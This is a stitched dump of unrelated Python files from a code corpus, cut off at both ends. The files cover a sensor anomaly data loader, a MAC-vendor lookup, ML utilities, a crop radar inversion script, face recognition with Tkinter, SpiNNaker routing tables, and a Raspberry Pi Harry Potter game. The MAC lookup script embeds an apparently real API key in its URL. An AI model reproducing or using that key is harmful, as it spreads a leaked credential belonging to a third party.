num_workers=args.workers,shuffle=args.shuffle_batch), \\\n DataLoader(testset, batch_size=args.batch_size, num_workers=args.workers)\n\ndef split_train_test(full_dataframe, args):\n # set to 0.3 seconds unit\n data_len = len(full_dataframe.index)\n # train 30800\n idxs = [[i, i+1, i+2] for i in range(data_len - 2)]\n normal_idx = []\n abnormal_idx = []\n normal_idx_dir = args.dataset_file_path + args.dataset_file_name + '_normal_idx.pt' # _book_normal_idx.pt\n abnormal_idx_dir = args.dataset_file_path + args.dataset_file_name + '_abnormal_idx.pt' # _book_abnormal_idx.pt\n if False: # os.path.exists(normal_idx_dir)\n normal_idx = torch.load(normal_idx_dir)\n abnormal_idx = torch.load(abnormal_idx_dir)\n else:\n for a, b, c in tqdm(idxs):\n if full_dataframe.loc[a]['label'] == 0 and full_dataframe.loc[b]['label'] == 0 and full_dataframe.loc[c]['label'] == 0:\n normal_idx.append([a,b,c])\n elif (full_dataframe.loc[a]['label'] == 0 and full_dataframe.loc[b]['label'] == 0 and full_dataframe.loc[c]['label'] == 1):\n abnormal_idx.append([a, b, c])\n abnormal_idx.append([a+1, b+1, c+1])\n abnormal_idx.append([a+2, b+2, c+2])\n abnormal_idx.append([a+3, b+3, c+3])\n abnormal_idx.append([a+4, b+4, c+4])\n torch.save(normal_idx, normal_idx_dir)\n torch.save(abnormal_idx, abnormal_idx_dir)\n\n train_valid_test_ratio = [0.6, 0.2, 0.2]\n train_valid_size = [int(train_valid_test_ratio[0] * len(normal_idx)), int(train_valid_test_ratio[1] * len(normal_idx))]\n\n random.shuffle(normal_idx)\n\n trainset_idxs = normal_idx[:train_valid_size[0]]\n validset_idxs = normal_idx[train_valid_size[0]:train_valid_size[0] + train_valid_size[1]]\n testset_idxs = normal_idx[train_valid_size[0] + train_valid_size[1]:]\n\n # normal_idx = 50082\n # train 30049\n trainset = HsrDataset(args, trainset_idxs, full_dataframe)\n # valid 10016\n validset = HsrDataset(args, validset_idxs, full_dataframe)\n # test 10017 + 4800 = 14817\n testset = HsrDataset(args, testset_idxs+abnormal_idx, full_dataframe, test=True)\n return trainset, validset, testset\n\n\ndef get_Dataframe(args):\n All = False\n force_torque = False\n mic = False\n hand_camera = False\n head_depth = False\n\n if args.sensor == 'All':\n All = True\n elif args.sensor == 'force_torque':\n force_torque = True\n elif args.sensor == 'mic':\n mic = True\n elif args.sensor == 'hand_camera':\n hand_camera = True\n elif args.sensor == 'head_depth':\n head_depth = True\n\n # 0. save file already existed\n # if os.path.exists(args.save_data_name):\n # return torch.load(args.save_data_name)\n\n # 1. load csv files\n file_path = args.dataset_file_path + args.dataset_file_name # dataset/data_sum\n if args.dataset_file_name == 'data_sum':\n df_datasum = pd.read_csv(file_path + '0.csv')\n df_datasum = df_datasum.append(pd.read_csv(file_path + '1.csv'), ignore_index=True)\n df_datasum = df_datasum.append(pd.read_csv(file_path + '2.csv'), ignore_index=True)\n df_datasum = df_datasum.append(pd.read_csv(file_path + '3.csv'), ignore_index=True)\n df_datasum = df_datasum.append(pd.read_csv(file_path + '4.csv'), ignore_index=True)\n df_datasum = df_datasum.append(pd.read_csv(file_path + '5.csv'), ignore_index=True)\n df_datasum = df_datasum.append(pd.read_csv(file_path + '6.csv'), ignore_index=True)\n df_datasum = df_datasum.append(pd.read_csv(file_path + '7.csv'), ignore_index=True)\n if args.object_select_mode:\n df_objectlist = pd.read_csv(args.object_type_datafile_path)\n print(args.object_type)\n df_objectlist = df_objectlist[args.object_type]\n object_dir_list = df_objectlist.to_list()\n df_datasum = df_datasum[df_datasum['data_dir'].isin(object_dir_list)]\n else:\n # dataset_file_name == 'data_sum_motion' or 'data_sum_free'\n df_datasum = pd.read_csv(file_path + '0.csv')\n\n df_datasum.index = [i for i in range(len(df_datasum.index))]\n ## 2. essential erase\n if All:\n return df_datasum\n elif force_torque:\n hand_weight_series = df_datasum['cur_hand_weight']\n label_series = df_datasum['label']\n return pd.concat([hand_weight_series, label_series], axis=1)\n elif mic:\n mic_df = df_datasum['mfcc00']\n for i in range(1, 16):\n if i < 10:\n mic_df = pd.concat([mic_df, df_datasum['mfcc0' + str(i)]], axis=1)\n else:\n mic_df = pd.concat([mic_df, df_datasum['mfcc' + str(i)]], axis=1)\n label_series = df_datasum['label']\n return pd.concat([mic_df, label_series], axis=1)\n elif hand_camera or head_depth:\n hand_series = df_datasum['cur_hand_id']\n depth_series = df_datasum['cur_depth_id']\n data_dir = df_datasum['data_dir']\n label_series = df_datasum['label']\n return pd.concat([hand_series, depth_series, data_dir, label_series], axis=1)\n\n ##########################################################################\n# for layer_wised diff\ndef get_transformed_data(data_loader, model):\n \"\"\"\n Multi indexing support\n \"\"\"\n x = []\n y = []\n for r, d, m, t, _y in tqdm(data_loader):\n try:\n _x = model.fusion(r, d, m, t)\n x.append(_x)\n y.append(_y)\n except Exception as e:\n pass\n\n if type(_x) == np.ndarray:\n x = np.stack(x)\n elif type(_x) == torch.Tensor:\n x = torch.stack(x)\n else:\n raise NotImplementedError\n\n if type(_y) == np.ndarray:\n y = np.array(y)\n elif type(_y) == torch.Tensor:\n y = torch.stack(y)\n\n return x, y\n\n\n\n","sub_path":"modules/data_loader.py","file_name":"data_loader.py","file_ext":"py","file_size_in_byte":11956,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"12734880","text":"import requests\nimport sys\n\n\ndef get_mac_details(get_url):\n try:\n mac_address = sys.argv[1]\n get_url += mac_address\n res = requests.get(url=get_url)\n\n api_result = res.json()\n\n return api_result[\"vendorDetails\"].get(\"companyName\")\n except Exception as _e:\n print(f\"Exception in getting the company name: {_e}\")\n return None\n\n\n\n\nif __name__ == \"__main__\":\n\n get_url = \"https://api.macaddress.io/v1?apiKey=at_0wTH4bbyRfos4Bf8x04poMaKipGXV&output=json&search=\"\n \n company_name = get_mac_details(get_url)\n print(company_name)\n","sub_path":"get_mac_details.py","file_name":"get_mac_details.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"436230577","text":"from itertools import islice\n\nimport numpy as np\nfrom numpy.random import permutation\n\n\ndef numerical_grad(func, input_, h=1e-6):\n \"\"\"Computes partial derivatives of func wrt. input_ using the\n center divided difference method. Used to gradient check\n analytical solutions.\n\n Parameters\n ----------\n func: callable\n A function whose derivatives should be computed.\n\n input_: scalar or array-like\n Partial derivatives are computed wrt. input_.\n\n h: float, default 1e-6\n A spacing used when computing the difference, should\n be small.\n\n Returns\n -------\n grad: scalar or array-like of shape input_.shape\n \"\"\"\n\n if np.isscalar(input_):\n return np.sum((func(input_ + h) - func(input_ - h)) / (2 * h))\n\n grad = np.zeros(input_.shape)\n\n for i in np.ndindex(input_.shape):\n forward = input_.copy()\n forward[i] += h\n\n backward = input_.copy()\n backward[i] -= h\n\n center_divided_diff = (func(forward) - func(backward)) / (2 * h)\n grad[i] = np.sum(center_divided_diff)\n\n return grad\n\n\ndef yield_data_in_batches(batch_size, X, y=None, shuffle=True):\n \"\"\"Generates batches of input data.\n\n Parameters\n ----------\n batch_size: int\n Number of examples in a single batch.\n\n X: array-like, shape (n_samples, n_features)\n The input data.\n\n y: array-like, shape (n_samples,)\n The target values. Can be omitted.\n\n shuffle: bool, default True\n Whether the examples are shuffled or not before\n put into batches.\n \"\"\"\n num_rows = X.shape[0]\n\n if shuffle:\n indices_gen = (i for i in permutation(num_rows))\n else:\n indices_gen = (i for i in np.arange(num_rows))\n\n num_yielded = 0\n\n while True:\n batch_indices = list(islice(indices_gen, batch_size))\n num_yielded += len(batch_indices)\n\n if y is None:\n yield X[batch_indices]\n else:\n yield X[batch_indices], y[batch_indices]\n\n if num_yielded == num_rows:\n return\n\n\ndef classification_accuracy(y, y_pred):\n \"\"\"Computes the classification accuracy.\n\n Parameters\n ----------\n y: array-like, shape (n_samples,)\n The true target values (i.e. the ground truths).\n\n y_pred: array-like, shape (n_samples,)\n The predicted target values.\n \"\"\"\n return np.mean(np.equal(y, y_pred))\n","sub_path":"nnlib/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2414,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"42005928","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Nov 29 09:23:28 2018\n\n@author: Administrator\n\"\"\"\nimport matplotlib.pyplot as plt\nimport matplotlib\nimport numpy as np\nfrom sklearn.metrics import mean_absolute_error\nimport pandas as pd\n########################\n\n###Load and create LUT database first\nY1 = pd.read_csv('calibrationcrop.csv',header=None)\n#Pandas dataframe to matrix conversion\nYm=Y1.values\n#Incidence angle\nthr=Ym[:,3]#Col3==Local Inc Angle in rad\nthr = np.float64(thr)\nYm0=np.float64(Ym[:,0])#Col0==PAI_True\n#Ym1=np.float64(Ym[:,1])#Col1==Wetbiomass;\nYm2=np.float64(Ym[:,2])#Col2==Soilmoisture\nY=np.column_stack((Ym0,Ym2))\n\n\nXVH = pd.read_csv('VHsimulatedCorn.csv',header=None)\n#XVH=np.float64(XVH.as_matrix(columns=None))\nXVV = pd.read_csv('VVsimulatedCorn.csv',header=None)\n#XVV=np.float64(XVV.as_matrix(columns=None))\n#X=np.column_stack((XHH,XHV,XVH,XVV))\n#X=np.column_stack((XHH,XHV,XVH,XVV,thr))\n\nY2=pd.concat([XVH,XVV,Y1],axis=1,ignore_index=True)\n############################\n\ndf1=np.column_stack((Ym0,Ym2,XVH,XVV,thr))\n\n########################################################################################################\n###Load validation data\n#replacing 'no info' and '.' i.e. blank space or 'None' string with NaN\ncornval = pd.read_excel('ValidationPoints.xlsx',na_values = ['no info', '.','None','#VALUE!', '#DIV/0!'],skiprows=[0],header=None);\nvald=cornval.dropna(subset=[1]) \n \nvaldm=vald.values\n\n#Incidence angle\nvalthr=(3.1415/180)*valdm[:,0]#Col15==Local Inc Angle\nvalthr = np.float64(valthr)\n#valHH=np.float64(valdm[:,17])#Col16==HH; 17==HV; 18==VH; 19==VV\n#valHV=np.float64(valdm[:,18])\nvalVH=np.float64(valdm[:,4])\nvalVV=np.float64(valdm[:,3])\nvallai=np.float64(valdm[:,1])#Col6==PAI_True; Col7==LAI\nvalbiom=np.float64(valdm[:,1])#Col9==Wetbiomass; Col8==VWC; Col10==drybiomass\nvalsm=np.float64(valdm[:,2])#Col5==Soilmoisture\n#valY=np.column_stack((vallai,valsm))\nvalY=vallai\n\n#valX=np.column_stack((valHH,valHV,valVH,valVV))\nvalX=np.column_stack((valVH,valVV))\n\ndf2=vald;\n\n\nnumrows = len(valX) \nlaiout = np.zeros(numrows)\nsmout= np.zeros(numrows)\n\nfor index, row in vald.iterrows():\n #m = 10000\n min = None\n for index1, row1 in Y2.iterrows():\n \n #RMSE\n rmse=np.sqrt((((row[4]-row1[0])**2)+\n ((row[3]-row1[1])**2))/2)\n# \n #L1 estimate\n# rmse = (abs(row[4]-row1[0]) + abs(row[3]-row1[1]))\n \n #Bhattacharya distance\n# rmse = (-np.log(1 + (row[4]*row1[0])**0.5 - 0.5*(row[4] + row1[0]) +\n# (row[3]*row1[1])**0.5 - 0.5*(row[3] + row1[1])))\n \n if laiout[index] == 0 or rmse < min:\n min = rmse\n laiout[index] = row1[3]\n #smout[index] = row1[4]\n \n \n \n#rmse value between datafrmae and list \nvalrmselailut=((vallai - laiout) ** 2).mean() ** .5\nvalrrlailut=np.corrcoef(vallai, laiout) \nmaelai=mean_absolute_error(vallai,laiout)\n\n\n\n#df3 = pd.DataFrame(\n# {'PAIp': laiout\n# })\n##write dataframe to excel\n#writer = pd.ExcelWriter('LUTRetrievedPAIBiom.xlsx', engine='xlsxwriter')\n## Convert the dataframe to an XlsxWriter Excel object.\n#df3.to_excel(writer, sheet_name='Sheet1')\n#\n## Close the Pandas Excel writer and output the Excel file.\n#writer.save()\n\n\n\n\n#####Plotting PAI\n#Plotting\nplt.plot(vallai,laiout, 'go')\nplt.xlim([0, 6])\nplt.ylim([0, 6])\nplt.xlabel(\"Observed LAI ($m^2 m^{-2}$)\")\nplt.ylabel(\"Estimated LAI ($m^2 m^{-2}$)\")\nplt.plot([0, 6], [0, 6], 'k:')\nplt.annotate('r = %.2f'%valrrlailut[0,1], xy=(0.5, 5.5))#round off upto 3decimals\nplt.annotate('RMSE = %.2f'%valrmselailut, xy=(0.5, 5.0))\nplt.annotate('MAE = %.2f'%maelai, xy=(0.5, 4.5))\nmatplotlib.rcParams.update({'font.size': 20})\nplt.yticks(np.arange(0, 7, 2))\nplt.xticks(np.arange(0, 7, 2))\nplt.gca().set_aspect('equal', adjustable='box')\n#plt.savefig('PAIValidationLUT.png',bbox_inches=\"tight\",dpi=100)\nplt.show()\n\n","sub_path":"Chapter05/Sec543/Inversion_LUT.py","file_name":"Inversion_LUT.py","file_ext":"py","file_size_in_byte":3998,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"456747838","text":"__author__ = 'Onekam'\n\nimport readingData\n\nsong_to_plays = {}\n\n# this will calculate how long a song \"lives\" or is listened to frequently on average\ndef songLifeSpan_total(username):\n song_to_plays = readingData.map_song_to_plays(username)\n\n for key in song_to_plays:\n for key2 in song_to_plays[key]:\n x = songLifeSpan_individual(key, key2)\n\ndef songLifeSpan_individual(artist, song):\n no_plays = len(song_to_plays[artist][song])\n # find oldest and newest plays of song\n # calculuate the amount of plays in an n-day period\n # do some stats-y stuff probably\n\n\n","sub_path":"songLifeSpan.py","file_name":"songLifeSpan.py","file_ext":"py","file_size_in_byte":595,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"226004142","text":"from django import template\n# from home.forms import HackathonUserDataForm\nfrom home.models import HomePage\n\n__author__ = 'stefan'\n\nregister = template.Library()\n\n@register.assignment_tag(takes_context=True)\ndef get_template(context, page):\n return page.get_template(context['request'])\n\n@register.assignment_tag(takes_context=True)\ndef filtered_sections(context, slug):\n root = HomePage.objects.get(slug=slug)\n new_list = []\n for s in root.sections:\n new_list.append(s)\n return new_list[1:-1]\n\n\n@register.assignment_tag(takes_context=True)\ndef site_root(context):\n return HomePage.objects.get(slug='home')\n\n# @register.assignment_tag(takes_context=True)\n# def user_form(context):\n# return HackathonUserDataForm()\n\n\ndef icon_title(title):\n title = title.replace('Application Enablement', 'Application
Enablement')\n return title\n\nregister.filter(icon_title)","sub_path":"home/templatetags/hackathon_tags.py","file_name":"hackathon_tags.py","file_ext":"py","file_size_in_byte":894,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"606884925","text":"# Face Recognition system from ( image , video , webcam ) \r\n# face detection using Dlib and classification using Facenet paper implimentation \r\n# our model load pretrained weights (facenet model weights)\r\n\r\nimport sys\r\n# to ignore np and h5 warnings :\r\nif not sys.warnoptions:\r\n import warnings\r\n warnings.simplefilter(\"ignore\")\r\nimport os\r\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'\r\n\r\nimport numpy as np\r\nimport tensorflow as tf\r\n# to ignore tensorflow warnings appears in runtime shell :\r\ntf.logging.set_verbosity(tf.logging.ERROR)\r\n\r\nimport tkinter as tk\r\nfrom tkinter import messagebox\r\nfrom tkinter import filedialog\r\nfrom utils.fr_utils import *\r\nfrom model_components.inception_blocks_v2 import *\r\nfrom utils.triplet_loss_fun import *\r\nfrom database.faces_database import *\r\nfrom system_components.recognize_from_image import *\r\nfrom system_components.recognize_from_webcam import *\r\n\r\n# determine the way floating point numbers, arrays and other NumPy objects are displayed to be unique\r\nnp.set_printoptions(threshold=np.nan) \r\n\r\n#tkinter gui to access sysem functionality :\r\ntry:\r\n#while(True):\r\n #main Window\r\n master = tk.Tk()\r\n master.geometry(\"800x400\")\r\n master.title(\"Face Recognition System\")\r\n\r\n\r\n #Loading System Components window function :\r\n def system_loading():\r\n #print(\"initiate model\")\r\n label = tk.Label(master, text=\"Model Initiation\", bg=\"white\", fg=\"green\")\r\n label.pack()\r\n # initiate our model and specifying the input image shape by accessing model_components.inception_blocks_v2 :\r\n FRmodel = faceRecoModel(input_shape=(3, 96, 96))\r\n\r\n # print(\"Total Params:\", FRmodel.count_params())\r\n #print(\"compile model\")\r\n label = tk.Label(master, text=\"Model Compilation\", bg=\"white\", fg=\"black\")\r\n label.pack()\r\n # model configration and specify it's compiling parameters :\r\n FRmodel.compile(optimizer = 'adam', loss = triplet_loss, metrics = ['accuracy'])\r\n\r\n #print(\"weights loading\")\r\n label = tk.Label(master, text=\"Weights Loading\", bg=\"white\", fg=\"red\")\r\n label.pack()\r\n #Facenet weights loading :\r\n load_weights_from_FaceNet(FRmodel)\r\n\r\n #print(\"database loading\")\r\n label = tk.Label(master, text=\"Database Loading\", bg=\"white\", fg=\"blue\")\r\n label.pack()\r\n\r\n #load cropes faces database data from database.txt :\r\n database,load_error = load_database(FRmodel)\r\n if(load_error !=\" \"):\r\n #print(load_error)\r\n #warning message if the database dictionary :\r\n messagebox.showinfo(\"Error\", load_error)\r\n\r\n\r\n label = tk.Label(master, text=\"Please Add Known People To Your System :\", bg=\"green\", fg=\"white\")\r\n label.pack()\r\n\r\n add_known_faces_button = tk.Button(master, text=\"Add Known People\", command=lambda:add_known_faces_window(FRmodel))\r\n add_known_faces_button.pack()\r\n\r\n label = tk.Label(master, text=\"Select your Recognition Input :\", bg=\"green\", fg=\"white\")\r\n label.pack()\r\n\r\n image_recognition_button = tk.Button(master, text=\"Recognize People from Image\", command=lambda:image_recognition_window(FRmodel,database))\r\n image_recognition_button.pack()\r\n cam_recognition_button = tk.Button(master, text=\"Recognize People from Live Camera Streaming\", command=lambda:cam_recognition_window(FRmodel,database))\r\n cam_recognition_button.pack()\r\n label = tk.Label(master, text=\"Terminate The System\", bg=\"green\", fg=\"white\")\r\n label.pack()\r\n close_button = tk.Button(master, text=\"Close\", command=quit)\r\n close_button.pack()\r\n\r\n #add_known_faces window function :\r\n def add_known_faces_window(FRmodel):\r\n master2 = tk.Tk()\r\n master2.geometry(\"600x400\")\r\n master2.title(\"Adding Known People\")\r\n\r\n #Selecting known faces images to store the main window\r\n label = tk.Label(master2, text=\"Welcome ..\", bg=\"green\", fg=\"white\")\r\n label.pack()\r\n label = tk.Label(master2, text=\"Click Add Pleople Button Below To Add Images Of Your Known People.\", bg=\"green\", fg=\"white\")\r\n label.pack()\r\n label = tk.Label(master2, text=\"Please Specify The Seected People Names In Each Image File Name.\", bg=\"green\", fg=\"white\")\r\n label.pack()\r\n add_faces_button = tk.Button(master2, text=\"Add Known People\", command=lambda:add_known_faces_fun(FRmodel,master2))\r\n add_faces_button.pack()\r\n\r\n #add_known_faces function :\r\n def add_known_faces_fun(FRmodel,master):\r\n try:\r\n filenames = filedialog.askopenfilenames(initialdir = \"/\",title = \"Select file\",filetypes = ((\"jpg files\",\"*.jpg\"),(\"png files\",\"*.png\"),(\"all files\",\"*.*\")))\r\n if not filenames:\r\n messagebox.showinfo(\"Error\", \"No Image Selected !\")\r\n else:\r\n create_database(FRmodel,filenames,master)\r\n except:\r\n messagebox.showinfo(\"Error\", \"Image Selection Error!\")\r\n\r\n #image regognition window function :\r\n def image_recognition_window(FRmodel,database):\r\n master3 = tk.Tk()\r\n master3.geometry(\"600x400\")\r\n master3.title(\"Image Recognition\")\r\n\r\n\r\n label = tk.Label(master3, text=\"Welcome .. Start Recognize People By Image :\", bg=\"green\", fg=\"white\")\r\n label.pack()\r\n label = tk.Label(master3, text=\"Please Select An Image And Then Click The Recognition Button.\", bg=\"green\", fg=\"white\")\r\n label.pack()\r\n\r\n\r\n select_image = tk.Button(master3, text=\"select image\", command=lambda:load_image_fun(FRmodel,database,master3))\r\n select_image.pack()\r\n label = tk.Label(master3, text=\"Terminate Image Recognition\", bg=\"green\", fg=\"white\")\r\n label.pack()\r\n close_button = tk.Button(master3, text=\"Close\", command=master3.destroy)\r\n close_button.pack()\r\n master3.mainloop()\r\n\r\n #load image fun :\r\n def load_image_fun(FRmodel,database,master):\r\n try:\r\n recognition_fraction = 0.59\r\n filename = filedialog.askopenfilename(initialdir = \"/\",title = \"Select file\",filetypes = ((\"jpg files\",\"*.jpg\"),(\"png files\",\"*.png\"),(\"all files\",\"*.*\")))\r\n if not filename:\r\n messagebox.showinfo(\"Error\", \"No Image Selected !\")\r\n else:\r\n #print(filename)\r\n # print(\"recognizing input image\")\r\n # recognize image :\r\n empty_database_loading_error = detect_faces(filename,database , FRmodel,recognition_fraction,master)\r\n # handling the case that the stored known faces database is empty :\r\n if(empty_database_loading_error != \" \"):\r\n messagebox.showinfo(\"Error\", empty_database_loading_error)\r\n except:\r\n messagebox.showinfo(\"Error\", \"Image Selection Error!\")\r\n\r\n #cam streaming regognition window function :\r\n def cam_recognition_window(FRmodel,database):\r\n master4 = tk.Tk()\r\n master4.geometry(\"700x650\")\r\n master4.title(\"Live Camera Streaming Recognition\")\r\n label = tk.Label(master4, text=\"Live Camera Streaming\", bg=\"green\", fg=\"white\")\r\n label.pack()\r\n newwindow = tk.Button(master4, text=\"Start Live Streaming Recognition\", command=lambda:cam_fun(FRmodel,database,master4))\r\n newwindow.pack()\r\n master4.mainloop()\r\n\r\n #determinatin fun :\r\n #def determinate_fun(master,):\r\n\r\n #cam function :\r\n def cam_fun(FRmodel,database,master):\r\n try:\r\n recognition_fraction = 0.59\r\n cam_index = 0\r\n empty_database_loading_error = webcam_detect_faces(database,FRmodel,recognition_fraction,cam_index,master)\r\n # handling the case that the stored known faces database is empty :\r\n if(empty_database_loading_error != \" \"):\r\n #print(empty_database_loading_error )\r\n messagebox.showinfo(\"Error\", empty_database_loading_error)\r\n except:\r\n messagebox.showinfo(\"Error\", \"Camera Error!\")\r\n \r\n #main window components :\r\n\r\n #welcoming label in the main window\r\n label = tk.Label(master, text=\"Please Click The Button Below And Wait To Start Our System.\", bg=\"green\", fg=\"white\")\r\n label.pack()\r\n label = tk.Label(master, text=\"Please Be Patient .. It May Take A Bit To Start.\", bg=\"green\", fg=\"white\")\r\n label.pack()\r\n system_loading_button = tk.Button(master, text=\"Start System Componants Loading\", command=system_loading)\r\n system_loading_button.pack()\r\n\r\n master.mainloop()\r\nexcept:\r\n # message box display\r\n messagebox.showinfo(\"Unexpected Error\", \"Something went Wrong ..!\")","sub_path":"FaceRecognition/face_recognition.py","file_name":"face_recognition.py","file_ext":"py","file_size_in_byte":8715,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"195176686","text":"from pacman.model.routing_tables.multicast_routing_table import \\\n MulticastRoutingTable\nfrom pacman.model.routing_tables.multicast_routing_tables import \\\n MulticastRoutingTables\nfrom spinn_machine.multicast_routing_entry import MulticastRoutingEntry\nfrom spinn_machine.utilities.progress_bar import ProgressBar\n\n\nclass ICub4ChipReflectorRoutingTableGenerator(object):\n \"\"\" An basic algorithm that can put a hardcoded routing table entry into the\n routers for spinnlink comms\n \"\"\"\n\n def __call__(self):\n\n # progress bar\n progress_bar = ProgressBar(3, \"Generating hardcoded routing tables\")\n\n # container\n routing_tables = MulticastRoutingTables()\n\n # make entries\n multicast_routing_entry_0_0 = \\\n MulticastRoutingEntry(0, 0x00000000, [], [3], False)\n\n multicast_routing_entry_0_1_1_0 = \\\n MulticastRoutingEntry(0, 0x00000000, [], [0], False)\n\n # make routing tables\n chip_0_0_router_table = MulticastRoutingTable(0, 0)\n chip_1_0_router_table = MulticastRoutingTable(1, 0)\n chip_0_1_router_table = MulticastRoutingTable(0, 1)\n\n # add entry to table\n chip_0_0_router_table.add_multicast_routing_entry(\n multicast_routing_entry_0_0)\n progress_bar.update()\n chip_0_1_router_table.add_multicast_routing_entry(\n multicast_routing_entry_0_1_1_0)\n progress_bar.update()\n chip_1_0_router_table.add_multicast_routing_entry(\n multicast_routing_entry_0_1_1_0)\n\n # add to container\n routing_tables.add_routing_table(chip_0_0_router_table)\n routing_tables.add_routing_table(chip_1_0_router_table)\n routing_tables.add_routing_table(chip_0_1_router_table)\n\n progress_bar.end()\n\n # return tables to stack\n return routing_tables\n\n\n\n\n","sub_path":"pf_spinn/reflector/routing_table_generators/icub_4_chip_reflector_routing_table_generator.py","file_name":"icub_4_chip_reflector_routing_table_generator.py","file_ext":"py","file_size_in_byte":1858,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"215910142","text":"import enum\nimport os\nimport signal\nimport sys\nimport time\n\nimport digitalio\nimport board\nimport adafruit_rgb_display.st7789 as st7789\nimport busio\nimport subprocess\nimport qwiic_twist\nimport qwiic_button\n\nfrom PIL import Image, ImageDraw, ImageFont\nfrom subprocess import call, Popen\n\nimport RPi.GPIO as GPIO \n\ncwd = os.getcwd()\n\ndef speak(command):\n subprocess.run([\"sh\", \"GoogleTTS_demo.sh\", command])\n # call(f\"espeak -ven -k5 -s150 --stdout '{command}' | aplay\", shell=True)\n time.sleep(0.5)\n\ndef display_image(img):\n display_img = Image.open(f'{cwd}/imgs/{img}')\n display_img = image_formatting(display_img, width, height)\n disp.image(display_img, rotation)\n\ndef get_user_input(correct_answer = 1, should_speak=False, wrong_answer_prompt='Press Ctrl-C to exit. Otherwise, try again:'):\n decision = type(correct_answer)(input('Enter your choice: '))\n while decision != correct_answer:\n if should_speak:\n speak(wrong_answer_prompt)\n decision = type(correct_answer)(input(wrong_answer_prompt))\n return decision\n\ndef blink_button(button):\n while not button.is_button_pressed():\n button.LED_on(255)\n time.sleep(0.5)\n button.LED_off()\n time.sleep(0.5)\n button.LED_off()\n\ndef blink_both_buttons():\n while not (redButton.is_button_pressed() or greenButton.is_button_pressed()):\n redButton.LED_on(255); greenButton.LED_on(255)\n time.sleep(0.5)\n redButton.LED_off(); greenButton.LED_off()\n time.sleep(0.5)\n red_pressed = redButton.is_button_pressed()\n redButton.LED_off(); greenButton.LED_off()\n return red_pressed\n\ndef signal_handler(sig, frame):\n print('Closing Gracefully')\n audio_stream.terminate()\n sys.exit(0)\n\n# Configuration for CS and DC pins (these are FeatherWing defaults on M0/M4):\ncs_pin = digitalio.DigitalInOut(board.CE0)\ndc_pin = digitalio.DigitalInOut(board.D25)\nreset_pin = None\n\n# Config for display baudrate (default max is 24mhz):\nBAUDRATE = 64000000\n\n# Setup SPI bus using hardware SPI:\nspi = board.SPI()\n\n# Create the ST7789 display:\ndisp = st7789.ST7789(\n spi,\n cs=cs_pin,\n dc=dc_pin,\n rst=reset_pin,\n baudrate=BAUDRATE,\n width=135,\n height=240,\n x_offset=53,\n y_offset=40,\n)\n\nhardware = 'plughw:2,0'\naudio_stream = Popen(\"/usr/bin/cvlc alsa://\"+hardware+\" --sout='#transcode{vcodec=none,acodec=mp3,ab=256,channels=2,samplerate=44100,scodec=none}:http{mux=mp3,dst=:8080/}' --no-sout-all --sout-keep\", shell=True)\n\n\n# Create blank image for drawing.\n# Make sure to create image with mode 'RGB' for full color.\nheight = disp.width # we swap height/width to rotate it to landscape!\nwidth = disp.height\nimage = Image.new(\"RGB\", (width, height))\nrotation = 90\n\n# Get drawing object to draw on image.\ndraw = ImageDraw.Draw(image)\n\n# Draw some shapes.\n# First define some constants to allow easy resizing of shapes.\npadding = -2\ntop = padding\nbottom = height - padding\n\n# Alternatively load a TTF font. Make sure the .ttf font file is in the\n# same directory as the python script!\n# Some other nice fonts to try: http://www.dafont.com/bitmap.php\nfont = ImageFont.truetype(\"/usr/share/fonts/truetype/dejavu/DejaVuSans.ttf\", 18)\n\n# Turn on the backlight\nbacklight = digitalio.DigitalInOut(board.D22)\nbacklight.switch_to_output()\nbacklight.value = True\nbuttonA = digitalio.DigitalInOut(board.D23)\nbuttonB = digitalio.DigitalInOut(board.D24)\nbuttonA.switch_to_input(digitalio.Pull.UP)\nbuttonB.switch_to_input(digitalio.Pull.UP)\n\n# Set up the rotary pin\ntwist = qwiic_twist.QwiicTwist()\ntwist.begin()\ntwist_count = 0\ntwist.set_blue(255)\ntwist.set_red(100)\ntwist.set_green(255)\n\n# Set up buttons\nredButton = qwiic_button.QwiicButton()\nredButton.begin()\n\ngreenButton = qwiic_button.QwiicButton(address=0x62)\ngreenButton.begin()\n\n# Configure screen buttons\nbuttonA = digitalio.DigitalInOut(board.D23)\nbuttonB = digitalio.DigitalInOut(board.D24)\nbuttonA.switch_to_input()\nbuttonB.switch_to_input()\n\ndef image_formatting(image2, width=240, height=135):\n image2 = image2.convert('RGB')\n # Scale the image to the smaller screen dimension\n image2 = image2.resize((width, height), Image.BICUBIC)\n return image2\n\nhouses = ['Gryffinndor', 'Hufflepuff', 'Ravenclaw', 'Slitherin']\nclass Scene(enum.Enum):\n WELCOME = 0\n ARE_YOU_READY = 1\n DIAGON_ALLEY = 2\n BRICK_IMAGE = 3\n OLLIVANDERS = 4\n CHOOSE_WAND = 5\n HOGWARTS_EXPRESS = 6\n BEANS = 7\n SUITCASE = 8\n USE_SPELL = 9\n SORTING_HAT = 10\n CHOOSE_HOUSE = 11\n THANK_YOU = 12\n\nimg_dict = {\n Scene.WELCOME: 'welcome_hogwarts.jpeg',\n Scene.ARE_YOU_READY: 'ready.png',\n Scene.DIAGON_ALLEY: 'diagon-alley.png',\n Scene.BRICK_IMAGE: 'puzzle.png', \n Scene.OLLIVANDERS: 'ollivanders.jpg',\n Scene.CHOOSE_WAND: 'wands.jpeg',\n Scene.HOGWARTS_EXPRESS: 'hogwarts-express.jpg',\n Scene.BEANS: 'beans.png',\n Scene.SUITCASE: 'suitcase.jpg',\n Scene.USE_SPELL: 'open-suitcase.jpg',\n Scene.SORTING_HAT: 'great-hall.jpeg',\n Scene.CHOOSE_HOUSE: 'house-0.png',\n Scene.THANK_YOU: 'thankyou.png'\n}\n\nscreen = 